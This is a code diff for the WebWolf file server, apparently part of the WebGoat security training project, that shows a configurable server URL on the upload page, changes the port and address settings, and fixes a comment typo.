@Value("${webwolf.fileserver.location}") @Value("${webwolf.fileserver.location}")
private String fileLocatation; private String fileLocatation;
@Value("${server.address}")
private String server;
@Value("${server.port}")
private int port;
@PostMapping(value = "/WebWolf/fileupload") @PostMapping(value = "/WebWolf/fileupload")
@SneakyThrows @SneakyThrows
@ -84,6 +89,7 @@ public class FileServer {
} }
modelAndView.addObject("files", uploadedFiles); modelAndView.addObject("files", uploadedFiles);
modelAndView.addObject("webwolf_url", "http://" + server +":" + port);
return modelAndView; return modelAndView;
} }
} }

4
webwolf/src/main/resources/application.properties
View File

@ -2,8 +2,8 @@ server.error.include-stacktrace=always
server.error.path=/error.html server.error.path=/error.html
server.session.timeout=6000 server.session.timeout=6000
#server.contextPath=/WebWolf #server.contextPath=/WebWolf
server.port=8081 server.port=9090
server.address=127.0.0.1 server.address=localhost
server.session.cookie.name = WEBWOLFSESSION server.session.cookie.name = WEBWOLFSESSION
spring.datasource.url=jdbc:hsqldb:hsql://${webgoat.server.address:localhost}:9001/webgoat spring.datasource.url=jdbc:hsqldb:hsql://${webgoat.server.address:localhost}:9001/webgoat

4
webwolf/src/main/resources/templates/files.html
View File

@ -20,7 +20,7 @@
</p> </p>
<p> <p>
Each file will be available under the following url: Each file will be available under the following url:
http://localhost:8081/files/{username}/{filename}. <span th:text="${webwolf_url}">http://localhost:9090/</span>/files/{username}/{filename}.
</p> </p>
<p> <p>
You can copy and paste the location from the table below. You can copy and paste the location from the table below.
@ -33,7 +33,7 @@
</div> </div>
<div class="panel-body"> <div class="panel-body">
<!-- Standar Form --> <!-- Standard Form -->
<form th:action="@{/WebWolf/fileupload}" method="post" enctype="multipart/form-data"> <form th:action="@{/WebWolf/fileupload}" method="post" enctype="multipart/form-data">
<div class="form-inline"> <div class="form-inline">
<div class="form-group"> <div class="form-group">